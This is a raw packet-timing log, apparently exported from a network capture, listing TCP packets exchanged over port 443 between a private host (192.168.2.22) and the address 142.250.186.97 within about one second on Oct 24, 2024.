                                          Oct 24, 2024 08:59:12.925136089 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.932476044 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.932552099 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.932565928 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.941220045 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.941340923 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.941355944 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.949899912 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:12.949975014 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:12.949989080 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.017292976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.017388105 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.017411947 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.017513037 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.017570019 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.017582893 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.018160105 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.018224001 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.018237114 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.019206047 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.019262075 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.019278049 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.023761988 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.023827076 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.023840904 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.032583952 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.032674074 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.032689095 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.042756081 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.042840004 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.042854071 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.049922943 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.050014019 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.050026894 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.058403015 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.058574915 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.058588982 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.067246914 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.067336082 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.067351103 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.068074942 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.068149090 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.068161964 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.134454966 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.134555101 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.134571075 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.135169029 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.135246038 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.135257959 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.135842085 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.135910988 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.135924101 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.136555910 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.136616945 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.136631012 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.140841961 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.140909910 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.140923023 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.149642944 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.149719000 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.149732113 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.160288095 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.160368919 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.160382986 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.167429924 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.167506933 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.167520046 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.175885916 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.175983906 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.175997019 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.184412003 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.184510946 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.184524059 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.226174116 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.226269007 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.226289988 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.251816034 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.251903057 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.251918077 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.252152920 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.252228022 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.252240896 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.252981901 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.253065109 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.253077984 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.253787994 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.253854990 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.253868103 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.258181095 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.258248091 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.258264065 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.258383036 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.258447886 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.258460999 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.267513990 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.267596006 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.267611027 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.277415991 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.277503014 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.277518988 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.284712076 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.284794092 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.284811020 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.293772936 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.293853998 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.293868065 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.308044910 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.308124065 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.308137894 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.369226933 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.369319916 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.369343042 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.369465113 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.369510889 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.369517088 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.369975090 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.370018959 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.370023966 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.370592117 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.370636940 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.370642900 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.371563911 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.371618986 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.371624947 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.372852087 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.372926950 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.375153065 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.384197950 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.384260893 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.384270906 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.384459019 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.384530067 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.384535074 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.387197018 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.387257099 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.394370079 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.401654005 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.401731014 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.401740074 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.410366058 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.410459042 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.410469055 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.424921989 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.425024033 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.425066948 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.425316095 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.425374985 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.425386906 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.486200094 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.486341953 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.486371994 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.486438036 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.486531019 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.486548901 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.487413883 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.487473965 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.487488031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.488270044 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.488333941 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.488348007 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.488475084 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.488486052 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.492597103 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.492676973 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.492690086 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.492857933 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.492909908 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.492922068 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.501509905 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.501585007 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.501600027 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.511674881 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.511751890 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.511770010 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.512816906 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.516809940 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.518502951 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.527601004 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.527682066 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.527697086 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.542387962 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.542550087 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.542576075 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.542608976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.542654991 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.542748928 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.543699026 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.543754101 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.543782949 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.603380919 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.603518963 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.603543997 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.603630066 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.603704929 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.603765011 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.604569912 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.604633093 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.604661942 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.604896069 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.604959965 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.604974031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.605931044 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.605983973 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.605998039 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.609637976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.609735966 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.609750032 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.618938923 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.619009018 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.619021893 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.629160881 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.629244089 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.629257917 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.635989904 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.636080980 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.636106968 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.645245075 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.645323992 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.645342112 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.655685902 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.655699015 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.659595013 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.659688950 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.659696102 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.659728050 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.659774065 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.659816027 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.660701990 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.660773039 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.660788059 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.720659018 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.720768929 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.720971107 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.721019983 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.721049070 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.721086979 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.721750975 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.721844912 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.721877098 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.722162962 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.722237110 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.722251892 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.723021984 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.723143101 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.723155975 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.727051973 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.727127075 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.727138996 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.735847950 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.735924959 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.735938072 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.745445967 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.745517015 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.745528936 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.752688885 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.752758026 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.752769947 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.761509895 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.761579037 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.761594057 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.776613951 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.776762009 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.776781082 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.776853085 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.776911974 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.776930094 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.777061939 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.777120113 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.777133942 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.778450966 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.778522015 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.778536081 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.837694883 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.837821960 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.837862968 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.837925911 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.838010073 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.838027954 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.838762045 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.838840008 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.838852882 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.839418888 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.839483976 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.839498043 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.840190887 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.840256929 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.840270996 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.843800068 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.843923092 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.843931913 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.843962908 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.844080925 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.853105068 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.863038063 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.863116026 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.863131046 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.870220900 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.870290995 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.870304108 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.878810883 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.878889084 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.878901958 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.893456936 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.893544912 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.893556118 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.894018888 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.894082069 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.894088984 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.894721985 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.894778967 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.894784927 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.895442963 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.895500898 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.895507097 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.954665899 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.954771042 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.954777956 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.954900026 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.954961061 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.954967976 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.955574989 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.955635071 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.955641031 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.956469059 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.956535101 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.956542015 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.956681967 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.956742048 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.956749916 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.957320929 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.957381010 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.957387924 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.961153030 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.961215019 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.961220980 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.970144987 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.970258951 CEST49167443192.168.2.22142.250.186.97
                                          Oct 24, 2024 08:59:13.970264912 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.980241060 CEST44349167142.250.186.97192.168.2.22
                                          Oct 24, 2024 08:59:13.980359077 CEST49167443192.168.2.22142.250.186.97
